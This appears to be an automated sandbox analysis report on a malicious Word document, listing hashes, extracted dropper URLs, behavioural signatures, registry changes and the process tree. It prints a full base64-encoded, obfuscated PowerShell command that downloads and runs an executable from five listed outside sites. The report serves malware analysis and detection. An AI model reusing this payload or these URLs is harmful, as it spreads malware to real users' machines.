c4902a7a5058fe9b65d47d59dc62e36f5049146e5f551c1d5622226649da9888

General

Target

c4902a7a5058fe9b65d47d59dc62e36f5049146e5f551c1d5622226649da9888.doc
Size

210KB
MD5

2176e4f4af4abb52c7ae77cc4a30bb2d
SHA1

9dcaeb06fc0d3fd31b48875b271f48fd5450fb9e
SHA256

c4902a7a5058fe9b65d47d59dc62e36f5049146e5f551c1d5622226649da9888
SHA512

ea5ddb9f97ba02a860917bb6095f62f1ac6587ba86ee3e99aadab75d962a147a608ff4b48c0a297ee0971a40225edb86876ed990f08ff0704dcb5f646f04bb0c

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://ahuratech.com/ei9u4vn/T_8z/

exe.dropper

http://mindigroup.com/wp-admin/T_tB/

exe.dropper

http://extraspace.uk.com/wp-admin/i_Gl/

exe.dropper

http://nuoviclienti.net/hanemdg/Es_wv/

exe.dropper

http://eniyionfirma.com/wp-admin/CI_xj/

Signatures

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1856 WINWORD.EXE
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1856 WINWORD.EXE
1856 WINWORD.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

PoWeRsHelL.exe

description pid process

Token: SeDebugPrivilege 1968 PoWeRsHelL.exe
Office loads VBA resources, possible macro or embedded object present

pid	process
1856	WINWORD.EXE

pid	process
1856	WINWORD.EXE
1856	WINWORD.EXE

description	pid	process
Token: SeDebugPrivilege	1968	PoWeRsHelL.exe

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\TypeLib\{AF5E0F1B-943E-40FE-B368-01A0DD1B8DF1}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\TypeLib\{AF5E0F1B-943E-40FE-B368-01A0DD1B8DF1}\2.0\FLAGS\ = "6"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{AF5E0F1B-943E-40FE-B368-01A0DD1B8DF1}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{AF5E0F1B-943E-40FE-B368-01A0DD1B8DF1}\2.0\0\win32	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\TypeLib\{AF5E0F1B-943E-40FE-B368-01A0DD1B8DF1}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

PoWeRsHelL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1968	1932	PoWeRsHelL.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

PoWeRsHelL.exe

pid process

1968 PoWeRsHelL.exe
1968 PoWeRsHelL.exe
Blacklisted process makes network request 6 IoCs

Processes:

PoWeRsHelL.exe

flow pid process

5 1968 PoWeRsHelL.exe
7 1968 PoWeRsHelL.exe
9 1968 PoWeRsHelL.exe
11 1968 PoWeRsHelL.exe
13 1968 PoWeRsHelL.exe
15 1968 PoWeRsHelL.exe

pid	process
1968	PoWeRsHelL.exe
1968	PoWeRsHelL.exe

flow	pid	process
5	1968	PoWeRsHelL.exe
7	1968	PoWeRsHelL.exe
9	1968	PoWeRsHelL.exe
11	1968	PoWeRsHelL.exe
13	1968	PoWeRsHelL.exe
15	1968	PoWeRsHelL.exe

Drops file in System32 directory 1 IoCs

Processes:

PoWeRsHelL.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	PoWeRsHelL.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c4902a7a5058fe9b65d47d59dc62e36f5049146e5f551c1d5622226649da9888.doc"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Modifies registry class
PID:1856

C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe
PoWeRsHelL -e JABiAG8ANABaAEQAQwBRAD0AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAHMANAAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBBACcALAAnAEMAeABVACcAKQApADsAJABvAEEAQQBVAEEARwBEAEEAIAA9ACAAJwA5ADEANgAnADsAJABvADQAQgBCAFUAVQA9ACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGIARwBRACcALAAnADQAbwAnACkALAAnAGMAQwAnACwAJwBBACcAKQA7ACQAQgBBAGsAQQBVAEcAVQB3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABvAEEAQQBVAEEARwBEAEEAKwAoACIAewAwAH0AewAxAH0AIgAtAGYAJwAuAGUAeAAnACwAJwBlACcAKQA7ACQASABBAGMAUQBBAEMAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAHcAVQBBACcALAAnAE4AQgB4ACcAKQA7ACQARQBrAEQAWgBHAEQAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAGAALgB3AEUAYABCAEMAbABpAGUAYABOAFQAOwAkAFoAWgAxAHcAQQBEAD0AKAAiAHsAMQAwAH0AewA2AH0AewAyADQAfQB7ADIAMQB9AHsANAA2AH0AewAxADYAfQB7ADIANgB9AHsAMQAzAH0AewA5AH0AewAyADMAfQB7ADEAOQB9AHsAMwA4AH0AewA0ADMAfQB7ADEANAB9AHsAMAB9AHsAOAB9AHsAMwAwAH0AewAzADMAfQB7ADQANAB9AHsANwB9AHsAMgAwAH0AewAyADkAfQB7ADIAMgB9AHsANAA4AH0AewAzADEAfQB7ADQAfQB7ADEAMQB9AHsAMQA3AH0AewAyADgAfQB7ADMANAB9AHsAMQA1AH0AewAzADUAfQB7ADQANwB9AHsANAAwAH0AewAyADUAfQB7ADIANwB9AHsAMwAyAH0AewAzADYAfQB7ADEAOAB9AHsAMQB9AHsAMQAyAH0AewAzADcAfQB7ADMAOQB9AHsAMwB9AHsANQB9AHsANAA1AH0AewA0ADIAfQB7ADQAMQB9AHsAMgB9ACIALQBmACcAZAAnACwAJwBAACcALAAnAC8AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAaQByAG0AJwAsACcAbgBmACcAKQAsACcAaQAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBjAG8AJwAsACcAYQAuACcAKQAsACcAbQAnACkALAAnAGMAJwAsACcAdAAnACwAKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACAAJwBCACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBtAGkAJwAsACcAbgAvAFQAJwApACwAJwBfAHQAJwApACwAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAJwBpACcALAAnAG0AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAaQBnAHIAJwAsACcAbgBkACcAKQApACwAKAAiAHsAMQB9AHsAMAB9AHsAMwB9AHsAMgB9ACIALQBmACAAKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACAAJwB1ACcALAAnAHAAcwA6AC8AJwAsACcALwBhAGgAJwApACwAJwBoAHQAdAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcALgAnACwAJwB0AGUAYwBoACcAKQAsACcAcgBhACcAKQAsACcAbgAvAGkAJwAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHQAdABwADoALwAvAGUAJwAsACcAaAAnACkALAAnAG4AJwAsACcAaQB5ACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBwACcALAAnADoALwAvACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGEAJwAsACcAdwBwAC0AJwApACwAJwBtAC8AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAOgAvACcALAAnAHQAcAAnACkALAAnADkAdQAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcALwBAACcALAAnAF8ARwBsACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHYALwAnACwAJwBfAHcAJwApACwAJwBzACcAKQAsACcAdQAnACwAJwB0AHAAOgAnACwAJwBtAC8AJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBzAHAAJwAsACcAYQBjAGUAJwApACwAJwBvACcALAAnAG8AJwAsACcAYQAnACwAKAAiAHsAMgB9AHsAMwB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwBUAF8AJwAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0AHQAJwAsACcALwBAAGgAJwAsACcAOAB6ACcAKQAsACcANAB2ACcALAAnAG4ALwAnACkALAAnAG4AJwAsACcAaAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAcgBhACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAGUAeAB0ACcALAAnAC8ALwAnACkAKQAsACcALwAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAC0AJwAsACcAYQBkAG0AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBtAGQAZwAnACwAJwBlACcAKQAsACcAQAAnACwAJwB0ACcALAAnAC8AbgAnACwAJwAvAEUAJwAsACcAaQAnACwAJwBwAC4AJwAsACcAbwAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAbgBlAHQAJwAsACcALwBoACcAKQAsACcAXwB4AGoAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAGkAbgAnACwAJwAvAEMAJwApACwAJwBJACcAKQAsACcAYwBvACcALAAnAGgAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAJwAvAHcAcAAnACwAJwBtACcALAAnAC0AYQBkACcAKQAsACcAZQBpACcALAAoACIAewAyAH0AewAwAH0AewAxAH0AewAzAH0AIgAgAC0AZgAgACcAdgAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBpAGUAbgB0AGkAJwAsACcAaQBjAGwAJwApACwAJwB1AG8AJwAsACcALgAnACkALAAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAJwB3AHAAJwAsACcALgB1AGsAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcALwAnACwAJwAuAGMAbwBtACcAKQApACkALgAiAHMAcABMAGAAaQB0ACIAKAAnAEAAJwApADsAJABzAEEAVQBDAF8AbwA9ACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAYwBHACcALAAnAFUAJwApACwAJwBWAEIAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAcABfAFUAQgBBAEEAUQBVACAAaQBuACAAJABaAFoAMQB3AEEARAApAHsAdAByAHkAewAkAEUAawBEAFoARwBEAC4AIgBEAE8AVwBOAGwATwBhAGAAZABGAGAAaQBgAGwARQAiACgAJABwAF8AVQBCAEEAQQBRAFUALAAgACQAQgBBAGsAQQBVAEcAVQB3ACkAOwAkAEoAUQBRAFgAeABfAD0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAJwBBAHcAJwAsACcAUQAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAG8AJwAsACcAUQBBADEAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAQgBBAGsAQQBVAEcAVQB3ACkALgAiAGwAYABFAE4ARwB0AEgAIgAgAC0AZwBlACAAMgAxADUAOQA2ACkAIAB7ACYAKAAnAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEIAQQBrAEEAVQBHAFUAdwA7ACQASABBAF8ARwBBAFgAPQAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAQgBBACcALAAnAEQAQgAnACkALAAnAFEAJwAsACcAUAB3ACcAKQA7AGIAcgBlAGEAawA7ACQARwBjAHgAQgBEAEEAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAQQAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEIAawBCACcALAAnAFgAdwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAaABCAEIAQQBaAFoAQQA9ACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACcASgAnACwAJwBHAEIAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBEAEIAJwAsACcAdwBvACcAKQApAA==
1⤵
- Suspicious use of AdjustPrivilegeToken
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in System32 directory
PID:1968

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1856-1-0x0000000008A00000-0x0000000008A04000-memory.dmp

Filesize
16KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads